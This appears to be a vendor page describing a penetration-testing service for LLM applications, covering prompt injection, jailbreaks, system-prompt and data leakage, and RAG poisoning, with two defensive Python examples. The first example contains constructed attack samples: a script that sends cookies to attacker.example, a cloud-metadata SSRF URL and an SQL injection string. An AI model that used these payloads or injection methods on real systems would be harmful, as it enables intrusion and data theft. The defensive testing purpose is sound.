Pentest LLM
Your LLM applications open an attack surface that your usual tests do not cover.
We test your chatbots, assistants, agents and RAG pipelines the way an attacker would: prompt injection, guardrail bypass, system-prompt and context-data leakage, abuse of the tools exposed to an agent. Every scenario is replayed by hand and documented with a prioritised remediation plan.
France Cybersecurity Label
The LLM attack surface
An LLM application blends user input, external data and automated actions
A language model does not separate instruction from data: anything that enters its context (a user message, a RAG document, a web page fetched by a tool) can be read as a command. As soon as an assistant can call functions, query a database or trigger an action, a hostile input becomes an execution vector. We assess this surface following the OWASP Top 10 for LLM Applications, against your real application and its integration, not just the underlying model.
What we test
Four classes of flaws specific to LLM applications
Prompt injection and guardrail bypass
Direct injection through user messages and indirect injection through the sources the model ingests (RAG documents, web pages, e-mails). We test jailbreaks and instruction hijacking to push the model outside its intended role.
Data and system-prompt leakage
Extraction of the system prompt and its rules, of context or training data, and of information belonging to other users or tenants. We check session and tenant isolation and that secrets placed in the context are not disclosed.
Insecure output handling
A model response inserted into your application without validation can trigger XSS, SSRF or server-side code execution. We test the chain between a manipulated output and the code that consumes it (HTML rendering, API call, generated query).
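The chain described above, shown on the consuming side. This is an added illustration, not code from the firm's methodology or from any client application: it contrasts a response interpolated into HTML as markup with the same response escaped as text, gates a model-suggested URL through a host allowlist before a fetch tool would use it, and binds a model-chosen value into a database query as a parameter. The sample response, the URL, the allowlisted hosts and the in-memory `orders` table are all constructed for the example.

```python
"""Consuming model output as untrusted data: HTML, URL fetch, generated query.

Added illustration with constructed inputs; nothing here is captured from a
real model or application.
"""
import html
import ipaddress
import sqlite3
from urllib.parse import urlparse

# Constructed: a response a manipulated context could make the model emit.
SAMPLE_RESPONSE = (
    'Here is the summary you asked for.'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
)

# Constructed: a URL the model "recommends" that a fetch tool should load next.
SAMPLE_URL = "http://169.254.169.254/latest/meta-data/"

# Assumed allowlist of hosts the fetch tool is permitted to reach.
ALLOWED_FETCH_HOSTS = frozenset({"docs.example.com", "api.example.com"})


def render_unsafe(model_text: str) -> str:
    """The flawed pattern: the response is spliced into HTML as markup."""
    return f"<div class='answer'>{model_text}</div>"


def render_safe(model_text: str) -> str:
    """The response is text: escape it before it reaches the DOM."""
    return f"<div class='answer'>{html.escape(model_text, quote=True)}</div>"


def validate_fetch_url(url: str, allowed_hosts=ALLOWED_FETCH_HOSTS) -> bool:
    """Accept only http(s) URLs whose host is explicitly allowlisted.

    The literal-IP check is belt-and-braces: the allowlist holds names only,
    so loopback, private and link-local addresses never pass, but the check
    documents the intent and survives a later allowlist change.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    host = parsed.hostname.lower()
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    except ValueError:
        pass  # a hostname rather than a literal address
    return host in allowed_hosts


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER, customer TEXT, total REAL)")
    conn.executemany(
        "INSERT INTO orders VALUES (?, ?, ?)",
        [(1, "alice", 10.0), (2, "bob", 20.0)],
    )
    return conn


def lookup_orders(conn: sqlite3.Connection, customer: str) -> list:
    """A model-chosen value is bound as a parameter, never spliced into SQL,
    so a manipulated value cannot widen the query."""
    cur = conn.execute(
        "SELECT id, total FROM orders WHERE customer = ?", (customer,)
    )
    return cur.fetchall()


if __name__ == "__main__":
    print(render_unsafe(SAMPLE_RESPONSE))
    print(render_safe(SAMPLE_RESPONSE))
    print("fetch allowed:", validate_fetch_url(SAMPLE_URL))
    db = build_demo_db()
    print(lookup_orders(db, "alice"))
    print(lookup_orders(db, "alice' OR '1'='1"))
```

The point of the three functions is the same: the code that consumes the response decides how it is interpreted, so escaping, allowlisting and parameter binding belong at the consumer, not in the prompt.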
Excessive agency and RAG-chain poisoning
Abuse of the tools and functions exposed to an agent (over-broad permissions, unconfirmed actions) and poisoning of the knowledge base to steer answers or exfiltrate data through the RAG chain. We check the real limits of what a compromised agent can trigger.
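One way to bound what an agent can trigger, as an added example that is not the firm's code or any client's: the model proposes tool calls, but a gateway outside the model decides whether each one runs, from the caller's role, a per-tool argument rule, and an explicit user confirmation for state-changing actions, and records every decision for review. The tool names (`read_ticket`, `refund_order`), the roles, the confirmation callback and the ticket and order data are constructed for the example.

```python
"""A tool gateway that limits what an agent can trigger.

Added illustration with constructed tools, roles and data. The confirmation
callback stands in for a prompt to the human user; the model never answers it.
"""
from dataclasses import dataclass
from typing import Any, Callable, Optional

# Constructed back-end data standing in for a ticketing and orders system.
TICKETS = {"T-1": {"subject": "Login problem", "customer": "alice"}}
ORDERS = {"O-7": {"customer": "alice", "total": 40.0, "refunded": 0.0}}


def read_ticket(ticket_id: str) -> dict:
    return TICKETS[ticket_id]


def refund_order(order_id: str, amount: float) -> dict:
    order = ORDERS[order_id]
    order["refunded"] += amount
    return order


def no_check(args: dict) -> Optional[str]:
    """Default argument rule: nothing to object to."""
    return None


def check_refund(args: dict) -> Optional[str]:
    """Refunds must be positive and must not exceed what is left of the order."""
    order = ORDERS.get(args.get("order_id"))
    amount = args.get("amount")
    if order is None or not isinstance(amount, (int, float)):
        return "bad arguments"
    if amount <= 0 or order["refunded"] + amount > order["total"]:
        return "amount outside allowed range"
    return None


@dataclass(frozen=True)
class ToolSpec:
    name: str
    handler: Callable[..., Any]
    mutates_state: bool        # state-changing calls need explicit user confirmation
    allowed_roles: frozenset   # roles whose sessions may have the agent call this tool
    validate: Callable[[dict], Optional[str]] = no_check  # reason to deny, or None


class ToolGateway:
    def __init__(self, specs, confirm: Callable[[str, dict], bool]):
        self._specs = {s.name: s for s in specs}
        self._confirm = confirm
        self.audit: list = []  # every allow/deny decision, for later review

    def invoke(self, user_role: str, tool_name: str, args: dict) -> dict:
        spec = self._specs.get(tool_name)
        if spec is None:
            return self._deny(tool_name, args, "tool not exposed")
        if user_role not in spec.allowed_roles:
            return self._deny(tool_name, args, f"role {user_role!r} not permitted")
        reason = spec.validate(args)
        if reason:
            return self._deny(tool_name, args, reason)
        if spec.mutates_state and not self._confirm(tool_name, args):
            return self._deny(tool_name, args, "user declined confirmation")
        result = spec.handler(**args)
        self.audit.append(("allow", tool_name, args))
        return {"ok": True, "result": result}

    def _deny(self, tool_name: str, args: dict, reason: str) -> dict:
        self.audit.append(("deny", tool_name, args, reason))
        return {"ok": False, "reason": reason}


def build_gateway(confirm: Callable[[str, dict], bool]) -> ToolGateway:
    """Register the only two tools the agent is allowed to see."""
    return ToolGateway([
        ToolSpec("read_ticket", read_ticket, False, frozenset({"support", "finance"})),
        ToolSpec("refund_order", refund_order, True, frozenset({"finance"}), check_refund),
    ], confirm)


if __name__ == "__main__":
    # A support session whose user answers "no" to every confirmation prompt.
    gw = build_gateway(lambda tool, args: False)
    for role, tool, args in [
        ("support", "read_ticket", {"ticket_id": "T-1"}),
        ("support", "refund_order", {"order_id": "O-7", "amount": 40.0}),
        ("support", "export_all_customers", {}),
    ]:
        print(tool, gw.invoke(role, tool, args))
    for entry in gw.audit:
        print(entry)
```

Whatever the model is talked into proposing, the gateway only ever runs a registered handler, for a permitted role, with arguments that pass the tool's own rule, and state changes still wait for the user. The audit list is what the remediation plan would point a detection team at.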
Frequently asked questions
What to know before an LLM pentest
How does an LLM pentest differ from an automated scan?
A scanner flags known patterns but does not reason about application context. Most LLM flaws come from the chain between a manipulated input, the ingested data and the actions the model can trigger. We build and replay those scenarios by hand, adapting each payload to the observed behaviour of your application.
What do we need to provide to scope the engagement?
Access to the application and its test accounts, a description of the tools and functions exposed to the agent, and the nature of the sources feeding the RAG. Access to the system prompt and the architecture (grey-box mode) speeds up the analysis, but we can also work black-box depending on your needs. The exact scope is agreed during initial scoping.
What is the deliverable and how long does the engagement take?
You receive a report detailing each vulnerability, its replayable proof of concept, its business impact and a prioritised remediation, followed by a debrief meeting. A standard LLM application test usually runs between 5 and 10 working days depending on the number of functions, agents and RAG sources in scope.
Other domains
Explore our other penetration tests
Pentest Web
Your web apps and APIs carry business logic that an automated scanner cannot probe.
Pentest Mobile
Find the flaws in your iOS and Android app before an attacker exploits them.
Pentest IoT
Before you ship, find out what an attacker can do with your connected device.
Pentest Cloud
One over-permissive IAM role or an open bucket is enough to compromise your whole cloud.
Penetration testing overview
Does your AI application do what you think, and nothing else?
Tell us about your LLM application and its scope, and we will send a tailored quote within 48h.